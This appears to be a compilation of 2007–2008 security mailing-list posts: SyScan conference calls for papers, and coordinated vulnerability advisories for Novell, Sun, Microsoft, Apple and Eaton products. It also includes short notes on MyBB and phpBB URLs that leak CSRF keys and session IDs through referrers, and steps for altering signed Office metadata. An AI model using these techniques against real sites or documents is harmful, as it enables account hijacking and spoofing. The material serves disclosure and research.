Dates for SyScan'09
dear all There will be 4 SyScan'09 conferences next year in 4 different exciting countries in Asia. They are as follows: SyScan'09 Shanghai: 14th and 15th May 2009 SyScan'09 Hong Kong: 19th and 20th May 2009 SyScan'09 Singapore: 2nd and 3rd July July 2009 SyScan'09 Taiwan: 7th and 8th July 2009 Do keep a lookout for more information at www.syscan.org. We will be announcing the CFP very soon. -- Thank you Thomas Lim Organiser SyScan'08 www.syscan.org
MyBB 1.4.3 my_post_key Disclosure Vulnerability
## #MyBB 1.4.3 my_post_key Disclosure Vulnerability by NBBN (http://nbbnsblog.co.cc) # ## Vendor: http://mybboard.net Date: November 25, 2008 These URLs contains "my_post_key". Moderators and admins use these sometimes, depending on what they want to do with a thread. my_post_key is used to perform various actions and to prevent CSRF. These pages shows the posts of the users. If some of these posts have pictures, the referrer will be transfered to the server of the images. #Vuln URLs# http://localhost/mybb/moderation.php?action=mergeposts&tid=1&modtype=thread&my_post_key=[key] # http://localhost/mybb/moderation.php?action=split&tid=1&modtype=thread&my_post_key=[key] # http://localhost/mybb/moderation.php?action=deleteposts&tid=1&modtype=thread&my_post_key=[key] # Finally, an attacker has the postkey, and can perform some interesting moderator or administrator actions with csrf.
Re: Re: Re: Re: Opera 9.6x file:// overflow
If I open specialy crafted html file - ok, exploit is working, but if I put that file on the server and receive it from the network with my opera, exploit does not work! why???
iDefense Security Advisory 10.30.08: Novell eDirectory NCP Get Extension Information Request Memory Corruption Vulnerability
iDefense Security Advisory 10.03.08 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 03, 2008 I. BACKGROUND Novell eDirectory is cross platform directory server. NetWare Core Protocol, commonly referred to as NCP, is used by eDirectory to synchronize data between servers in the directory tree. NCP supports various request types, one of which is the 'Get NCP Extension Information By Name Request.' For more information, see the vendor's site found at the following link. http://www.novell.com/products/edirectory/ II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Novell Inc.'s eDirectory could allow an attacker to execute arbitrary code with the privileges of the affected service. The vulnerability exists due to an area of heap memory being used after it has already been freed. By sending malformed data it is possible to cause an area of heap memory to be freed by one thread, and then reused after another thread allocates the same area of memory. This results in the original thread operating on the data changed by the second thread, which may lead to the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the affected service, usually SYSTEM. In order to trigger this vulnerability, an attacker needs to send a series of specifically timed requests and have some degree of control of the memory layout of the process. In Labs testing, it was often difficult to reliably trigger the vulnerability. While difficult, the possibility of executing arbitrary code should not be ruled out. IV. DETECTION iDefense has confirmed the existence of this vulnerability in eDirectory version 8.8 SP2 for Windows. The Linux version does not appear to be affected. Previous versions may also be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Novell has released a patch for this vulnerability and advises that all users of Novell eDirectory should update. http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5037180.html http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5037181.html VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 03/10/2008 Initial vendor notification 03/14/2008 Initial vendor reply 10/03/2008 Public Disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
n.runs-SA-2008.009 - Eaton MGE OPS Network Shutdown Module - authentication bypass vulnerability and remote code execution
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2008.009 27-October-2008 Vendor: Eaton MGE office protection systems Affected Products: Network Shutdown Module version 3.10 Vulnerability: authentication bypass vulnerability and remote code execution Risk: High Vendor communication: 2008/08/13initial notification of EATON MGE Office Protection Systems (MGEOPS) 2008/08/20second notification of MGEOPS 2008/08/20MGEOPS confirmation of receiving information 2008/08/25receiving patch proposal from MGEOPS 2008/08/29confirmation of proper patch, asking of release date 2008/09/02awaiting feedback regarding release date of the patch 2008/09/18patch and new version undergoing QA process of MGEOPS still no release date known 2008/10/07another request regarding the release date 2008/10/21MGEOPS informs n.runs AG about release of the new software version 2008/10/27n.runs AG releases this advisory Overview: EATON MGE Office Protection Systems designs and manufactures secured power products and solutions for enterprises, small business and homes. The Network Shutdown Module continuously wait for information from the Management Proxy or Management Card connected to the EATON UPS and warns administrators and users if AC power fails and proceeds with graceful system shutdown before the end of battery backup power is reached. Description: Remote exploitation of an authentication bypass vulnerability could allow an attacker to execute arbitrary code. In detail, the following flaw was determined: - Custom actions can be added to the MGE frontend without authentication required (pane_actionbutton.php) - Actions can be executed (tested) without authentication required (exec_action.php) Impact: This problem can lead to a remote file execution vulnerability. It can allow an attacker to add and execute custom actions. The commands to be executed are included within the added action. The vulnerability is present in MGE Network Shutdown Module software versions prior 3.10 build 13. Solution EATON MGE Office Protection Systems has issued an update to correct this vulnerability. A new version of the software (version 3.20) can be found at: http://download.mgeops.com/explore/eng/network/net_sol.htm Credits: Bug found by Jan Rossmann and Jan Wagner of n.runs AG. References: This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php Subscribe to the n.runs newsletter by signing up to: http://www.nruns.com/newsletter_en.php About n.runs: n.runs AG is a vendor-independent consulting company specialising in the areas of: IT Infrastructure, IT Security and IT Business Consulting. In 2007, n.runs expanded its core business area, which until then had been project based consulting, to include the development of high-end security solutions. Application Protection System - Anti Virus (aps-AV) is the first high-end security solution that n.runs is bringing to the market. Copyright Notice: Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright 2008 n.runs AG. All rights reserved. Terms of use apply.
n.runs-SA-2008.008 - Internet Explorer HTML Object Memory Corruption and Remote Code Execution
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2008.008 21-October-2008 Vendor: Microsoft Affected Products: Internet Explorer 6 Internet Explorer 7 Windows XP SP2 & SP3 Windows 2000 SP4 Windows 2003 SP1 Vulnerability: Remote Code execution Risk: High Overview A remote code execution vulnerability exists in Internet Explorer due to accesses to uninitialized memory in certain cases of DTML constructs. As a result, memory may be corrupted in such a way that an attacker could execute arbitrary code in the context of the logged-on user. Impact -- An attacker could exploit the vulnerability by constructing a specially prepared Website, when a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Solution Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/bulletin/MS08-058.mspx Vendor communication: 2008/07/07 Thierry sends notification to Microsoft 2008/07/07 Acknowledgement and Receipt 2008/10/14 Microsoft publishes Credits --- Vulnerability discovered by Thierry Zoller About n.runs n.runs AG is a vendor-independent consulting company specializing in the areas of: IT Infrastructure, IT Security and IT Business Consulting. In 2007, n.runs expanded its core business area, which until then had been project based consulting, to include the development of high-end security solutions. Application Protection System - Anti Virus (aps-AV) is the first high-end security solution that n.runs is bringing to the market. Advisories can be found at : http://www.nruns.com/security_advisory.php Copyright Notice Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if n.runs has been advised of the possibility of such damages. Copyright n.runs AG. All rights reserved. Terms of use apply. Subscribe to the n.runs newsletter by signing up to: http://www.nruns.com/newsletter_en.php
iDefense Security Advisory 10.14.08: Sun Java Web Proxy Server FTP Resource Handling Heap-Based Buffer Overflow
iDefense Security Advisory 10.09.08 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 09, 2008 I. BACKGROUND Sun Microsystems Inc's Java System is a collection of server applications bundled together. One such server application included is the Web Proxy Server. This software implements proxy services including HTTP and SOCKSv5. For more information, visit http://www.sun.com/software/products/web_proxy/home_web_proxy.xml. II. DESCRIPTION Remote exploitation of a heap based buffer overflow in Sun Microsystems Inc.'s Sun Java Web Proxy could allow an attacker to execute arbitrary code. A heap based buffer overflow exists in the handling of FTP resources. Specifically the vulnerability resides within the code responsible for handling HTTP GET requests. III. ANALYSIS Exploitation of this issue allows an attacker to execute arbitrary code on the server. An attacker would need to locate the vulnerable server and construct a malicious HTTP GET request. The attacker would then send the HTTP GET request to the Sun Java Web Proxy Server and upon processing the request execution of arbitrary code would be possible. IV. DETECTION Sun Java System Web Proxy Server 4.0 through 4.0.7 is vulnerable in the following versions: SPARC Platform prior to patch 120981-15 x86 Platform prior to patch 120982-15 Linux prior to patch 120983-15 HP-UX prior to patch 123532-05 Windows prior to patch 126325-05 V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE Sun Microsystems has officially addressed this vulnerability with Alert # 242986. For more information, consult their bulletin at the following URL: http://sunsolve.sun.com/search/document.do?assetkey=1-66-242986-1 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4541 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/27/2008 Initial vendor notification 05/27/2008 Initial vendor response 10/09/2008 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Joxean Koret. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 10.14.08: Microsoft Visual Basic for Applications - Multiple Vulnerabilities
iDefense Security Advisory 10.14.08 http://labs.idefense.com/intelligence/vulnerabilities/ Oct 14, 2008 I. BACKGROUND Microsoft VBA is an implementation of Microsoft Visual Basic programming language for developing client desktop packaged applications and integrating them with existing data and systems. VBA is a built in feature in Microsoft Office. For more information, please visit following webpage: http://msdn.microsoft.com/en-us/isv/bb190538.aspx II. DESCRIPTION Several vulnerabilities exist in Microsoft Corp.'s Office Visual Basic for Applications (VBA) which could allow remote exploitation by an attacker. Exploitation could allow the execution of arbitrary code with the privileges of the current user. The types of vulnerabilities include heap overflows, memory corruption, invalid array indexing, and integer overflow. These vulnerabilities exist in the handling of an object embedded in an Office document. When processing this object, the VBA module does not validate any of several values correctly. By crafting an object that contains a specific value, corruption can be caused. This leads to a potentially exploitable condition. III. ANALYSIS Exploitation allows an attacker to execute arbitrary code in the context of the currently logged-on user. To exploit this vulnerability, the attacker must persuade a user to open a specially crafted Office document. Likely attack vectors include sending the file as an e-mail attachment or linking to the file on a website. By default, systems with Office 2000 installed will open Office documents from websites without prompting the user. This allows attackers to exploit this vulnerability without user interaction. Later versions of Office do not open these documents automatically unless the user has chosen this behavior. Using the Office Document Open Confirmation Tool for Office 2000 can prevent Office files from opening automatically from websites. Use of this tool is highly recommended for users still using Office 2000. Generally one needs to set Macro security Level to Medium to run VBA Macros, but that's not applicable for this vulnerability. This vulnerability can be exploited with the default High Macro Security Level. IV. DETECTION iDefense confirmed the existence of these vulnerabilities in the following versions of Microsoft Excel: 2000-SP3, XP-SP3, 2003-SP3. Excel 2007 and 2007-SP1 were not vulnerable. V. WORKAROUND Restrict access to VBE6.dll by executing Echo y|cacls "%ProgramFiles%\common files\microsoft shared\vba\vba6\vbe6.dll" /E /P everyone:N Impact of workaround: Office file with VBA content can't be loaded. VI. VENDOR RESPONSE Microsoft has officially addressed this vulnerability with Security Bulletin MS08-057. For more information, consult their bulletin at the following URL. http://www.microsoft.com/technet/security/bulletin/ms08-057.mspx VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3477 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/17/2007 Initial vendor notification for earliest vulnerability 04/18/2007 Initial vendor response 10/14/2008 Coordinated public disclosure IX. CREDIT The heap buffer overflow vulnerability was independently discovered by Lionel d'Hauenens of Laboskopia (reported through iDefense VCP program) and Jun Mao of iDefense Labs. The discoverer of the remaining vulnerabilities wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2008 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
n.runs-SA-2008.005 - Apple Inc. - CoreSer vices Framework’s CarbonCore Framework - Arbi trary Code Execution (remote)
r the credits that n.runs AG would like to have. 2008/07/13n.runs AG replies with the following statement: “As I [Sergio Alvarez] said and you agreed in my first e-mails, before sending any of my findings, whether you found them internally or somebody else reported the same bugs that I'm reporting, you (Apple) have to credit me for my findings for the simple reason that I'm reporting them to you instead of releasing them to the public while the bugs are not fixed. That said, I've checked all the credits given in "iPhone 2.0 and iPod touch 2.0" (http://support.apple.com/kb/HT2351) and the ones given in "QuickTime 7.5" (http://support.apple.com/kb/HT1991), and I haven't been credited in any of them. This is a clear violation of our RFP. If by Monday, July 14th 2008 the proper credits are not given to me, I'll release all the vulnerabilities and bugs that I've reported to you and also the ones I didn't report yet by Tuesday, July 15th 2008.” 2008/07/15Apple Inc. asks n.runs AG not to make their findings public and also publishes the credits for one of the issues reported. Apple also provides a status report for the previous findings. 2008/07/15n.runs AG provides further use-cases and attack vectors information to Apple Inc. 2008/07/23Apple Inc. creates a new security ID for the use-cases and attack vectors reported as a design issue to fix. 2008/07/23n.runs thanks Apple Inc. for the feedback and asks for a status report update 2008/08/01Apple Inc. notifies n.runs AG of the imminent release of an update and sends the related advisory and credits. (The update and credits were already available at the time n.runs AG read the email sent by Apple Inc.) 2008/08/01n.runs AG releases this advisory Overview: Carbon is a set of C APIs offering developers an advanced user interface toolkit, event handling, access to the Quartz 2D graphics library, and multiprocessing support. Developers have access to other C and C++ APIs, including the OpenGL drawing system and the Mach microkernel. CarbonCore gathers together a number of lower-level Mac OS Toolbox managers. Some of these are deprecated but essential to porting to Carbon. CarbonCore includes the old Device Manager, Date and Time Utilities, the Finder interface, Mixed Mode, CFM, the Thread Manager, the Collection Manager, the Script Manager, and more. Most of the Toolbox defines are in here. Description: A remotely exploitable vulnerability has been found in the file name parsing code. More specifically, passing a long file name to the CarbonCore framework file management API will trigger a stack buffer overflow. Impact: This problem can lead to remote arbitrary code execution if an attacker carefully crafts a file that exploits the aforementioned vulnerability. n.runs AG illustrated the exploitation using Safari and Mail - both present on a standard OS X installation - to demonstrate the risks. The attack surface is however not limited to these two applications: any software component that makes use of the CarbonCore framework may allow arbitrary code execution. The vulnerability is present in Apple CarbonCore Framework prior to the update released on Aug 1st, 2008. Solution: The vulnerability was reported on Apr 1st, 2008 and Apple Security Update has been issued to solve this vulnerability on Aug 1st, 2008. For detailed information about the fixes, follow the link in the references section [1] of this document. Credits: Bug found by Sergio ‘shadown’ Alvarez of n.runs AG. References: [1] http://support.apple.com/kb/HT2647 This Advisory and Upcoming Advisories: http://www.nruns.com/security_advisory.php Subscribe to the n.runs newsletter by signing up to: http://www.nruns.com/newsletter_en.php Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact [EMAIL PROTECTED] for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall n.runs be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damage
Confirmed Program for SyScan'08 Hong Kong
dear all the program for SyScan'08 Hong Kong is confirmed. date: May 29th and 30th, 2008 venue: Langham Place Hotel, Hong Kong Program: Attacking Telco Core Network - Philippe Langlois (TSTF) Real World Kernel Pool Exploitation - Kostya Kortchinsky (Immunity) Cyber Crime: Follow the Money - Pedro Bueno (McAfee) The Powerful Evil on Mobile Phone - Nanik (COSEINC) Securing Your Web Application Codes - Kurt Grutzmacher (Pacific Gas) Hacking RFiD Devices: Octopus Card?? - Adam Laurie (RFIDI0T.org) Attacking Anti-Virus - Sowhat (Nevis Lab) Anti-Forensic: Leaving the Police No Trails (the Grugq) Media Security in VOiP Systems - Shao Weidong (Secure Minded Consulting) Rambling on the Private Data Security: No more Eason Chan - Sun Bing Look out for SyScan'08 Singapore and SyScan'08 Taiwan. -- Thank you Thomas Lim Organiser SyScan'08 www.syscan.org
SyScan'08 Singapore - Call for Paper
the Call for Paper for SyScan'08 Singapore will close in 10 days' time on 30th April 2008. the program for SyScan'08 Hong Kong is out. do not miss the first hacker conference in this exotic "pearl of the orient" city. CALL FOR PAPERS/TRAINING SyScan'08 Singapore will be held on July 3rd and 4th at Novotel Clarke Quay. CFP COMMITTEE The Call for Papers committee for SyScan’08 comprises of the following personnel: 1. Thomas Lim – Organiser of SyScan and CEO of COSEINC 2. Dave Aitel – Founder and CTO of Immunitysec 3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye 4. Matthew “Shok” Conover – Symantec The CFP committee will review all submissions and determine the final list of speakers for SyScan’08. CONFERENCE TOPICS The focus for SyScan’08 will include the following: Operating Systems • Vista • Linux Mobile Devices/Embedded systems • SmartPhones • PDAs • Game Consoles Web 2.0 • Web services • PHP • .Net • Web applications Networking/Telecommunication • VoIP • 3G/3.5G network • IPv6 • WLAN/WiFi • GPRS Malware BotNets Virtualization Any topics that will catch the attention of the CFP committee and/or the world. TRAINING TOPICS SyScan’08 training topics will focus on the following areas: Web Applications • .Net applications • Java applications Networks • VoIP • 3G/3.5G network • IPv6 • WLAN/WiFi • GPRS Securing Windows/Linux Systems Databases Storage PRIVILEGES Speakers’ Privileges: • Return economy class air-ticket for one person. • 3 nights of accommodation. • Breakfast, lunch and dinner during conference. • After-conference party. • A very healthy dose of alcohol and fun. • S$500 cash for speakers with brand new presentations. Trainers’ Privileges: • 50% of net profit of class. • 2 nights of accommodation (conference). • After-conference party. • A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. CFP SUBMISSION: CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Training classes will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submissions must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection. Please send submission to [EMAIL PROTECTED] IMPORTANT DATES Singapore Final CFP Submission – 30th April 2008 Notification of Acceptance – 30th May 2008. Final Submission for Accepted Presentation Material (Speakers) – 15th June 2008 OTHER INFORMATION Please feel free to visit SyScan website to get a feel what this conference is all about – SHARE AND HAVE FUN! By agreeing to speak at the SyScan'08 you are granting SyScan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and all other mediums. -- Thank you Thomas Lim Organiser SyScan'08 www.syscan.org
phpBB 2.0.23 Session Hijacking Vulnerability
+ phpBB 2.0.23 Session Hijacking Vulnerability+ found by NBBN 13 Mar 2008 + + ::Information about this vulnerabilty If a moderator or an admin close a thread in phpBB 2.0.X, the sessionid is sending with GET: http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session] The admin/moderator are going to be redirected to the thread(with the session). If an attacker has posted an image in his post, he can see the referer and so the session id. And if the attacker have a good day and the admin close the thread, he can use all admin-functions with csrf. ::Fix No fix ::Workaround Upgrade to phpBB3 ::Tested under: phpBB 2.0.23 (localhost)
SyScan'08 Call for Paper/Training
CALL FOR PAPERS/TRAINING SyScan'08 Hong Kong will be held on May 29th and 30th at Langham Place. SyScan'08 Singapore will be held on July 3rd and 4th at Novotel Clarke Quay. CFP COMMITTEE The Call for Papers committee for SyScan’08 comprises of the following personnel: 1. Thomas Lim – Organiser of SyScan and CEO of COSEINC 2. Dave Aitel – Founder and CTO of Immunitysec 3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye 4. Matthew “Shok” Conover – Symantec The CFP committee will review all submissions and determine the final list of speakers for SyScan’08. CONFERENCE TOPICS The focus for SyScan’08 will include the following: Operating Systems • Vista • Linux Mobile Devices/Embedded systems • SmartPhones • PDAs • Game Consoles Web 2.0 • Web services • PHP • .Net • Web applications Networking/Telecommunication • VoIP • 3G/3.5G network • IPv6 • WLAN/WiFi • GPRS Malware BotNets Virtualization Additional topics for SyScan’08 Hong Kong: Security Policy/Best Practices Legislation Industry Specifics – • Finance • Hotels Any topics that will catch the attention of the CFP committee and/or the world. TRAINING TOPICS SyScan’08 training topics will focus on the following areas: Web Applications • .Net applications • Java applications Networks • VoIP • 3G/3.5G network • IPv6 • WLAN/WiFi • GPRS Securing Windows/Linux Systems Databases Storage PRIVILEGES Speakers’ Privileges: • Return economy class air-ticket for one person. • 3 nights of accommodation. • Breakfast, lunch and dinner during conference. • After-conference party. • A very healthy dose of alcohol and fun. • S$500 cash for speakers with brand new presentations. Trainers’ Privileges: • 50% of net profit of class. • 2 nights of accommodation (conference) (applicable for Singapore only). • After-conference party. • A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. CFP SUBMISSION: CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Training classes will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submissions must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection. Please send submission to [EMAIL PROTECTED] IMPORTANT DATES Hong Kong Final CFP Submission – 29th February 2008 Notification of Acceptance – 30th March 2008. Final Submission for Accepted Presentation Material (Speakers) – 15th April 2008 Singapore Final CFP Submission – 30th April 2008 Notification of Acceptance – 30th May 2008. Final Submission for Accepted Presentation Material (Speakers) – 15th June 2008 OTHER INFORMATION Please feel free to visit SyScan website to get a feel what this conference is all about – SHARE AND HAVE FUN! By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and all other mediums. -- Thank you Thomas Lim Organiser SyScan'07 www.syscan.org
SyScan'08 Call For Paper/Training
send submission to [EMAIL PROTECTED] *IMPORTANT DATES* *Hong Kong* Final CFP Submission – 29th February 2008 Notification of Acceptance – 30th March 2008. Final Submission for Accepted Presentation Material (Speakers) – 15th April 2008 *Singapore* Final CFP Submission – 30th April 2008 Notification of Acceptance – 30th May 2008. Final Submission for Accepted Presentation Material (Speakers) – 15th June 2008 *OTHER INFORMATION* Please feel free to visit SyScan website to get a feel what this conference is all about – SHARE AND HAVE FUN! By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and all other mediums. -- Thank you Thomas Lim Organiser SyScan'07 www.syscan.org
Re: AW: MS Office 2007: Digital Signature does not protect Meta-Data
Does this same issue appear in OpenOffice ODF format? Though it does not l= ook like a huge issue, of itself, it is similar to the way Microsoft ignore= s metadata in all files, which is a way to add executable code to applicati= ons with the names of known MS utilities, like notepad.exe. If the metadat= a file can be modified in the MS word properties dialog, it is also possibl= e to modify the file in a text editor, and probably get a MS document to ru= n arbitrary code when you open it. This is the impact that the original po= st does not make clear. Wolf Halton Halton Security Institute networkdefense.biz On Thu, 2007-12-13 at 17:42 +0100, Naujoks, Hans-Dietmar wrote: > Dear Mr. Poehls, >=20 > I think Microsoft does not consider metadata attached to a document as pa= rt of the document and so they decided not to include it in the content pro= tected by the certificate.=20 >=20 > This fits the way we use attaching metadata during the process of categor= ization to enable retrieval of a document by means and taxonomies of the re= cipient, not of the author. If instead, as you seem to propose, metadata wo= uld be treated as part of the document, attaching the metadata needed for r= etrieval purposes would invalidate the signature of the document.=20 >=20 > Therefore this time I would go with Microsoft for their solution fits our= needs and doesn't compromise the integrity protection of the document itse= lf in any serious way. Just think of it as a sticker placed on the outside = of a sealed envelope: You mustn't trust anything on the outside, just look = inside the envelope to find the information you can rely on. >=20 > Yours > H.-D. Naujoks > T=C3=9CV S=C3=9CD Informatik und Consulting Services GmbH >=20 > -----Urspr=C3=BCngliche Nachricht- > Von: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] rg.de]=20 > Gesendet: Mittwoch, 12. Dezember 2007 11:35 > An: bugtraq@securityfocus.com > Betreff: MS Office 2007: Digital Signature does not protect Meta-Data >=20 >=20 > Affects: Microsoft Office 2007 (12.0.6015.5000)=20 >=20 > MSO (12.0.6017.5000)=20 >=20 > possibly older versions >=20 >=20 >=20 > I. Background >=20 >=20 > Microsoft Office is a suite containing several programs to >=20 > handle Office documents like text documents or spreadsheets.=20 >=20 > The latest version uses an XML based document format.=20 >=20 > Microsoft Office allows documents to be digitally signed by >=20 > authors using certified keys, allowing viewers to verify the=20 >=20 > integrity and the origin based on the author's public key.=20 >=20 > The author's public key certificate, which can come from a=20 >=20 > trusted third party, is embedded in the signed document.=20 >=20 > It is XML DSig based. >=20 >=20 >=20 > II. Problem Description >=20 >=20 > Microsoft Office documents carry meta data information=20 >=20 > according to the DublinCore metadata in the file=20 >=20 > docProps/core.xml . Among these meta data information=20 >=20 > are the fields "LastModifiedBy", "creator" together with=20 >=20 > several others that can be displayed/changed through the=20 >=20 > following menu "Office Button -> Prepare -> Properties". >=20 > These entries can be changed without invalidating the signature.=20 >=20 > At least under Windows Operating Systems these information are=20 >=20 > also shown in the Window's file systems properties. >=20 >=20 >=20 > III. Impact >=20 >=20 > The meta data of signed Microsoft Office documents can be=20 >=20 > changed. An attacker can change the values to spoof the origin=20 >=20 > of signed documents, hoping to induce trust or otherwise=20 >=20 > deceive the user. >=20 >=20 > III.1. Proof of Concept >=20 >=20 > Open the OOXML ZIP container of a signed document.=20 >=20 > Change the values in the docProps/core.xml file.=20 >=20 > For example set the value between "*"=20 >=20 > to "FooBar".=20 >=20 > The changes will be displayed in the document's properties=20 >=20 > dialog as described above. The signature will still be valid. >=20 >=20 >=20 > IV. Workaround >=20 >=20 > The meta data information of a signed OOXML document=20 >=20 > can be changed without invalidating the signature, thus=20 >=20 > information about the real author of a signed document can >=20 > only be retrieved from the certificate.=20 >=20 > The signed file's meta data can not be trusted as the=20 >=20 > meta data is not covered by the signature. >=20 > =20 >=20 >=20 > V. Solution >=20 >=20 > No possible solution. >=20 >=20 >=20 > VI. Correctio
Dell / Dell Financial Services - Contact
I've recently found a design flaw in the dell website regarding the shopping cart / purchasing system and was wondering if anyone could get me a contact to report it too?
Re: Win2K3 Priv Escalation
Thanks for all the replies, he got himself in, and they should be contacting local authorities or at least a lawyer today. It's a manufacturing company and for some reason 2 of the key services were ran under a user acct that once had admin permissions, without the administrative rights it wouldn't run and it couldn't be switched over to a system service because no one had rights to do so. A days worth of work down the drain, gotta love rogue employees is all i can say. Thanks again :)
Re: RFI In Script FlashChat_v479
I hope this event puts greater emphasis on *testing* bugs, instead of concentrating on speed of release. -John Martinelli RedLevel.org Security
Re: Defeating Citibank Virtual Keyboard protection using screenshot method
> If malware is running on the user's computer, can it change the > destination of a funds transfer invisibly to the user, and still have > the verification work? Theoretically, this is possible. An advanced client-side MITM attack could be crafted, altering packets on-the-fly and returning a false confirmation page. i.e.: normal response: "$100 USD has been transferred from [EMAIL PROTECTED] to [EMAIL PROTECTED]" altered response: "$100 USD has been transferred from [EMAIL PROTECTED] to [EMAIL PROTECTED]" -John Martinelli RedLevel.org Security
RE: Apple Safari on MacOSX may reveal user's saved passwords
It may be possible to exploit this by simply accessing a malicious website, but I have not tested this. Anyone willing to give it out a shot? Thanks, John Martinelli redlevel security redlevel.org - security training, consultation, and more.
Training Classes in SyScan'07
